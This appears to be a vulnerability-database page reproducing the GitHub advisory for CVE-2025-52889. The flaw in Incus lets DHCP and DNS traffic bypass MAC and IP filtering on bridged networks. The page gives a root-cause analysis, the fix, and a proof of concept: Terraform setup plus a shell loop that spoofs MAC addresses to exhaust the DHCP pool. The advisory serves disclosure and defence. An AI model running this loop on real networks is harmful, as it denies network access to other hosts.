3.4

CVSS Score

3.1

Basic Information

CVE ID

CVE-2025-52889

GHSA ID

GHSA-9q7c-qmhm-jv86

EPSS Score

0.05404%

CWE

CWE-770

Published

6/26/2025

Updated

6/28/2025

KEV Status

Technology

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2025-52889

CVE-2025-52889: Incus Allocation of Resources Without Limits allows firewall rule bypass on managed bridge networks

Summary

When using an ACL on a device connected to a bridge, Incus generates nftables rules for local services (DHCP, DNS...) that partially bypass security options security.mac_filtering, security.ipv4_filtering and security.ipv6_filtering. This can lead to DHCP pool exhaustion and opens the door for other attacks.

Details

In commit a7c33301738aede3c035063e973b1d885d9bac7c, the following rules are added at the top of the bridge input chain:

iifname "{{.hostName}}" ether type ip ip saddr 0.0.0.0 ip daddr 255.255.255.255 udp dport 67 accept
iifname "{{.hostName}}" ether type ip6 ip6 saddr fe80::/10 ip6 daddr ff02::1:2 udp dport 547 accept
iifname "{{.hostName}}" ether type ip6 ip6 saddr fe80::/10 ip6 daddr ff02::2 icmpv6 type 133 accept

However, these rules accept packets that should be filtered and maybe dropped by later rules in the "MAC filtering" snippet:

iifname "{{.hostName}}" ether type arp arp saddr ether != {{.hwAddr}} drop
iifname "{{.hostName}}" ether type ip6 icmpv6 type 136 @nh,528,48 != {{.hwAddrHex}} drop

Therefore, the MAC filtering is ineffective on those new rules. This allows an attacker to request as many IP as they want by sending a lot of DHCP requests with different MAC addresses. Doing so, they can exhaust the DHCP pool, resulting in a DoS of the bridge's network.

Additionaly, the commit adds non-restricted access to the local dnsmasq DNS server:

{{ if .dnsIPv4 }}
{{ range .dnsIPv4 }}
iifname "{{$.hostName}}" ip daddr "{{.}}" tcp dport 53 accept
iifname "{{$.hostName}}" ip daddr "{{.}}" udp dport 53 accept
{{ end }}
{{ end }}

{{ if .dnsIPv6 }}
{{ range .dnsIPv6 }}
iifname "{{$.hostName}}" ip6 daddr "{{.}}" tcp dport 53 accept
iifname "{{$.hostName}}" ip6 daddr "{{.}}" udp dport 53 accept
{{ end }}
{{ end }}

An attacker can send DNS requests with arbitrary MAC and IP addresses as well. These rules should also be after the MAC/IPv4/IPv6 filtering.

PoC

With this terraform infrastructure:

resource "incus_network_acl" "acl_allow_out" {
  name    = "acl-allow-out"
  egress = [
    {
      action           = "allow"
      destination      = "0.0.0.0-9.255.255.255,11.0.0.0-172.15.255.255,172.32.0.0-192.167.255.255,192.169.0.0-255.255.255.254"
      state            = "enabled"
    },
  ]
}
resource "incus_network_acl" "acl_allow_in" {
  name    = "acl-allow-in"
  ingress = [
    {
      action           = "allow"
      state            = "enabled"
    },
  ]
}

resource "incus_network" "br0" {
  name = "br0"
  config = {
    "ipv4.address"          = "10.0.0.1/24"
    "ipv4.nat"              = "true"
  }
}

resource "incus_instance" "machine1" {
  name  = "machine1"
  image = "images:archlinux/cloud"
  type = "virtual-machine"
  config = {
    "limits.memory" = "2GiB"
    "security.secureboot" = false
    "boot.autostart" = false
    "cloud-init.vendor-data" = <<-EOF
      #cloud-config
      package_update: true
      packages:
        - dhclient
        - tcpdump
      runcmd:
        - systemctl disable --now systemd.networkd.service
        - systemctl disable --now systemd.networkd.socket
    EOF
  }
  device {
    type = "disk"
    name = "root"
    properties = {
      pool = "default"
      path = "/"
      size = "64GiB"
    }
  }
  device {
    type = "nic"
    name = "eth0"
    properties = {
      network = incus_network.br0.name
      "security.ipv4_filtering" = true
      "security.acls" = join(",",
        [
          incus_network_acl.acl_allow_out.name,
          incus_network_acl.acl_allow_in.name,
        ])
    }
  }
}

resource "incus_instance" "machine2" {
  name  = "machine2"
  image = "images:archlinux/cloud"
  type = "virtual-machine"
  config = {
    "limits.memory" = "2GiB"
    "security.secureboot" = false
    "boot.autostart" = false
  }
  device {
    type = "disk"
    name = "root"
    properties = {
      pool = "default"
      path = "/"
      size = "64GiB"
    }
  }
  device {
    type = "nic"
    name = "eth0"
    properties = {
      network = incus_network.br0.name
    }
  }
}

An attacker in a VM requests many IP addresses and exhaust the pool:

[MACHINE1]$ for i in {0..99}; do for j in {0..99}; do ip link set address 10:66:6a:42:${i}:${j} dev enp5s0 ; dhclient -4 -i --no-pid ; done ; done

[HOST]$ cat /var/lib/incus/networks/br0/dnsmasq.leases  |wc -l
254

[HOST]$ incus start machine2

At this point, machine2 will not receive a lease from dnsmasq until another lease expires. If machine1 renews their malicious leases, machine2 will never get a lease.

Impact

All versions since a7c33301738aede3c035063e973b1d885d9bac7c, so basically v6.12 and v6.13.

(GitHub Advisory)

3.4

CVSS Score

3.1

Basic Information

CVE ID

CVE-2025-52889

GHSA ID

GHSA-9q7c-qmhm-jv86

EPSS Score

0.05404%

CWE

CWE-770

Published

6/26/2025

Updated

6/28/2025

KEV Status

Technology

Technical Details

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:L

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
github.com/lxc/incus/v6	go	>= 6.12, <= 6.13	6.14

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability stems from incorrectly ordered firewall rules for bridged network devices using nftables. The root cause is in commit a7c33301738aede3c035063e973b1d885d9bac7c, which intended to add basic connectivity rules for DHCP and DNS. However, these rules were added to the nftables template before the security.mac_filtering and security.ip_filtering rules were evaluated. This created a bypass, as incoming DHCP and DNS packets were accepted without checking their source MAC or IP addresses.

The primary vulnerable function is (Nftables).InstanceSetupBridgeFilter, which applies the flawed template. The function (*nicBridged).setFilters is also implicated as it was modified to trigger this vulnerable logic by collecting and passing DNS server data to InstanceSetupBridgeFilter.

An attacker inside a virtual machine connected to the bridge could exploit this by sending a large volume of DHCP requests, each with a different spoofed MAC address. Since the MAC filtering was bypassed, the DHCP server would lease a new IP for each request, quickly exhausting the available IP pool and causing a denial-of-service (DoS) for any other legitimate devices trying to connect to the network. The fix, implemented in commit 2516fb19ad8428454cb4edfe70c0a5f0dc1da214, reordered the rules in the nftables template, ensuring that MAC and IP filtering rules are processed before the DHCP and DNS 'accept' rules, thus closing the bypass.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

### Summ*ry W**n usin* *n **L on * **vi** *onn**t** to * *ri***, In*us **n*r*t*s n*t**l*s rul*s *or lo**l s*rvi**s (***P, *NS...) t**t p*rti*lly *yp*ss s**urity options `s**urity.m**_*ilt*rin*`, `s**urity.ipv*_*ilt*rin*` *n* `s**urity.ipv*_*ilt*rin*

Reasoning

T** vuln*r**ility st*ms *rom in*orr**tly or**r** *ir*w*ll rul*s *or *ri**** n*twork **vi**s usin* `n*t**l*s`. T** root **us* is in *ommit `****************************************`, w*i** int*n*** to *** **si* *onn**tivity rul*s *or ***P *n* *NS. *ow

3.4

Basic Information

Concerned about an active attack path?

CVE-2025-52889: Incus Allocation of Resources Without Limits allows firewall rule bypass on managed bridge networks

Summary

Details

PoC

Impact

3.4

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI